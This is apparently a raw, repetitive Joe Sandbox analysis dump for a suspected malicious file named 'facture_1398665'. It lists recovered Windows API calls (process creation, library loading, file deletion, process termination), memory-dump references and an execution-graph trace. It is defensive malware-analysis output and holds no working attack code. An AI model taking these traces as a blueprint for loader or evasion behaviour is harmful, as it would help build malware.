    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004AA36F
    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004AA3A0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00404C3F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,004FC763), ref: 004FBBD1
    • CloseHandle.KERNEL32(?), ref: 004FBBEE
      • Part of subcall function 004FBABC: GetLastError.KERNEL32(00000000,004FBB57,?,?,?), ref: 004FBADF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(0050BCD4,0050BCD4,00000001,00000000,00000000,004D2784,?,?,00000000,00000000), ref: 004D275C
    Strings
    • DP, xrefs: 004D2731
    • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 004D271D
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetThreadLocale.KERNEL32 ref: 00412EFA
    • GetSystemMetrics.USER32(0000004A), ref: 00412F4B
      • Part of subcall function 00412E7C: GetCPInfo.KERNEL32(00000000,?), ref: 00412E8C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • KillTimer.USER32(?,00000001), ref: 0044AAC9
    • SetTimer.USER32(?,00000001,?,00000000), ref: 0044AAEB
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetSystemMetrics.USER32(00000000), ref: 0042DCC6
    • GetSystemMetrics.USER32(00000001), ref: 0042DCD8
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • InterlockedCompareExchange.KERNEL32(?), ref: 0043812B
    • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00438095), ref: 00438138
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetSystemMetrics.USER32(00000000), ref: 0042DB79
    • GetSystemMetrics.USER32(00000001), ref: 0042DB85
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004A4EC4: LoadLibraryW.KERNEL32(00000000), ref: 004A4F24
      • Part of subcall function 004C1544: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004C1557
    • LoadLibraryW.KERNEL32(00000000), ref: 00501149
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 00479805
    • LoadCursorW.USER32(00000000,00000000), ref: 00479837
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • LoadLibraryW.KERNEL32(DWMAPI.DLL), ref: 00439512
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004DEED0: FreeLibrary.KERNEL32(72680000,004FDE18,00000000,004FDE27,?,?,?,?,?,004FE903), ref: 004DEEE6
      • Part of subcall function 004DEAEC: GetTickCount.KERNEL32(004DEA98,00000000,00000000,00000001,00000001,00000000,004DEB7E,?,00000000,?,004FDE1D,00000000,004FDE27), ref: 004DEB34
      • Part of subcall function 004B2054: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 004B2073
    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,004FE903), ref: 004FDE41
    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,004FE903), ref: 004FDE47
    Strings
    • Detected restart. Removing temporary directory., xrefs: 004FDDFB
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetKeyState.USER32(00000010), ref: 0045293F
    • GetKeyState.USER32(00000011), ref: 00452950
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • LoadLibraryW.KERNEL32(DWMAPI.DLL), ref: 004395D2
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,004AE3B7,00000000,004AE485,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004AE8AA), ref: 0047F788
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 004D52B5
    • CloseHandle.KERNEL32(00000000), ref: 004D52CC
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,005005E0,00000000,005005F3), ref: 004136BA
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(ole32.dll,?,00437DC6), ref: 00437D32
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000,005015E7), ref: 004FE942
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • Sleep.KERNEL32(?), ref: 004B016F
    • Sleep.KERNEL32(?), ref: 004B017F
      • Part of subcall function 004AD13C: DeleteFileW.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD173
      • Part of subcall function 004AD13C: GetLastError.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD17B
    • GetLastError.KERNEL32 ref: 004B0192
    • GetLastError.KERNEL32 ref: 004B019C
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd

    Execution Graph

    Execution Coverage:1.5%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:7.8%
    Total number of Nodes:696
    Total number of Limit Nodes:48

    Graph

    execution_graph 51329 6e0ab6c0 51330 6e0ab6cd 51329->51330 51333 6e0ab6fc 51330->51333 51332 6e0ab6f3 51340 6e0d56d0 51333->51340 51335 6e0ab708 EnterCriticalSection 51341 6e0ac6b9 51335->51341 51339 6e0ab73d 51339->51332 51340->51335 51359 6e0ac40f 51341->51359 51343 6e0ac6d3 51344 6e0ac6e6 _wcstombs_s_l 51343->51344 51353 6e0ab72c 51343->51353 51345 6e0ac718 51344->51345 51350 6e0e55eb 51344->51350 51372 6e0b36c0 51345->51372 51347 6e0e5610 _invoke_watson 51347->51350 51349 6e0ac72f _wcstombs_s_l 51349->51350 51351 6e0ac751 51349->51351 51350->51347 51352 6e0e561f 51350->51352 51350->51353 51354 6e0b10e0 __get_errno 3 API calls 51351->51354 51356 6e0ac766 51351->51356 51352->51351 51382 6e0b10e0 51352->51382 51358 6e0ab747 LeaveCriticalSection 51353->51358 51354->51356 51356->51353 51357 6e0b10e0 __get_errno 3 API calls 51356->51357 51357->51353 51358->51339 51360 6e0ac422 _mbstowcs_s_l 51359->51360 51361 6e0ac48b _wsetlocale 51359->51361 51362 6e0ac443 51360->51362 51371 6e0ac481 51361->51371 51364 6e0e549d _invoke_watson 51362->51364 51388 6e0b0cb0 51362->51388 51370 6e0e54a7 51364->51370 51366 6e0ac47b 51368 6e0b10e0 __get_errno 3 API calls 51366->51368 51367 6e0ac455 _mbstowcs_s_l 51369 6e0ac46e _wsetlocale 51367->51369 51367->51370 51368->51371 51369->51366 51370->51364 51370->51366 51371->51343 51373 6e0e831d _errno 51372->51373 51374 6e0b36d2 RtlAllocateHeap 51372->51374 51376 6e0ac724 51374->51376 51377 6e0e82e6 51374->51377 51376->51349 51376->51353 51377->51373 51378 6e0af6c0 __get_errno 8 API calls 51377->51378 51379 6e0e82f8 _callnewh 51377->51379 51378->51377 51379->51373 51380 6e0e8305 HeapAlloc 51379->51380 51380->51377 51381 6e0e8318 51380->51381 51381->51373 51383 6e0b1103 51382->51383 51384 6e0b10ec HeapFree 51382->51384 51383->51351 51384->51383 51385 6e0e71da GetLastError 51384->51385 51386 6e0a4e1e 51385->51386 51387 6e0e71e8 _errno 51386->51387 51387->51351 51391 6e0b0cc0 51388->51391 51389 6e0e70e4 _errno 51390 6e0b0cd8 RtlAllocateHeap 51392 6e0ac44d 51390->51392 51394 6e0e70ad 51390->51394 51391->51389 51391->51390 51392->51366 51392->51367 51394->51389 51395 6e0e70bf _callnewh 51394->51395 51398 6e0af6c0 GetLastError 51394->51398 51395->51389 51396 6e0e70cc HeapAlloc 51395->51396 51396->51394 51397 6e0e70df 51396->51397 51397->51389 51399 6e0af729 TlsGetValue 51398->51399 51400 6e0af6fa 51398->51400 51401 6e0af70d SetLastError 51399->51401 51403 6e0af702 51400->51403 51405 6e0de978 GetProcAddress 51400->51405 51406 6e0de962 51400->51406 51409 6e0b5eb9 51400->51409 51404 6e0af725 51401->51404 51403->51401 51404->51394 51405->51406 51407 6e0de98a 51405->51407 51406->51399 51407->51399 51408 6e0de9a2 51407->51408 51408->51408 51410 6e0b5ec9 LoadLibraryExW 51409->51410 51411 6e0b5ef7 51409->51411 51412 6e0e8cc5 GetLastError 51410->51412 51414 6e0b5ee9 51410->51414 51411->51400 51412->51414 51416 6e0e8cd0 __Stoull 51412->51416 51413 6e0b5f02 FreeLibrary 51415 6e0b5ef1 51413->51415 51414->51413 51414->51415 51415->51400 51416->51414 51417 6e0e8cf8 LoadLibraryExW 51416->51417 51417->51414 51418 1351031 51423 1353480 51418->51423 51422 1351040 51424 13534a3 51423->51424 51425 13534d1 51424->51425 51428 1358644 51424->51428 51433 1353390 51425->51433 51453 135b5ff 22 API calls Mailbox 51428->51453 51429 13534eb memcpy 51431 1351036 51429->51431 51432 135657e _crt_atexit _register_onexit_function 51431->51432 51432->51422 51434 135346e 51433->51434 51440 13533a6 51433->51440 51461 135b5f3 ?_Xlength_error@std@@YAXPBD 51434->51461 51436 13585e2 51437 135342a 51436->51437 51464 135318d 11 API calls Mailbox 51436->51464 51437->51429 51437->51431 51439 1358584 51442 135858e ?_Xbad_alloc@std@ 51439->51442 51440->51436 51440->51439 51441 13533f8 51440->51441 51440->51442 51443 1353405 51441->51443 51444 1358594 51441->51444 51442->51444 51454 13565a1 51443->51454 51446 135859b ?_Xbad_alloc@std@ 51444->51446 51447 13585a1 51444->51447 51446->51447 51448 13565a1 4 API calls 51447->51448 51449 135340b 51448->51449 51450 135341e 51449->51450 51462 135adae memcpy 51449->51462 51450->51437 51463 1355940 11 API calls Mailbox 51450->51463 51453->51431 51455 13565c5 malloc 51454->51455 51456 13565a6 _callnewh 51455->51456 51457 13565d2 51455->51457 51456->51455 51460 13565b3 51456->51460 51457->51449 51460->51455 51465 1357041 _CxxThrowException 51460->51465 51466 1357024 _CxxThrowException 51460->51466 51462->51450 51463->51436 51464->51437 51465->51460 51467 135618a 51471 1356c80 SetUnhandledExceptionFilter 51467->51471 51469 135618f 51470 1356194 _set_new_mode 51469->51470 51471->51469 51472 1351016 51473 1353480 23 API calls 51472->51473 51474 135101b 51473->51474 51477 135657e _crt_atexit _register_onexit_function 51474->51477 51476 1351025 51477->51476 51478 6e0b6bf0 51479 6e0e90d6 _errno 51478->51479 51482 6e0b6c0a 51478->51482 51502 6e107f60 19 API calls __get_errno 51479->51502 51481 6e0e90e6 51487 6e0b6855 51482->51487 51484 6e0b6c1c 51498 6e0b1b8c 51484->51498 51486 6e0b6c58 51488 6e0b6861 __Stoull 51487->51488 51489 6e0b687a EnterCriticalSection 51488->51489 51492 6e0b68b4 51488->51492 51490 6e0af6c0 __get_errno 8 API calls 51489->51490 51491 6e0b688e 51490->51491 51503 6e0b41e0 HeapFree GetLastError _errno __Stoull 51491->51503 51492->51484 51494 6e0b689f 51504 6e0b68bc LeaveCriticalSection 51494->51504 51496 6e0b68b0 51496->51492 51497 6e0b68d1 abort 51496->51497 51499 6e0b1b98 __Stoull 51498->51499 51505 6e0bc274 51499->51505 51501 6e0b1ba4 51501->51486 51502->51481 51503->51494 51504->51496 51506 6e0b0cb0 __get_errno 12 API calls 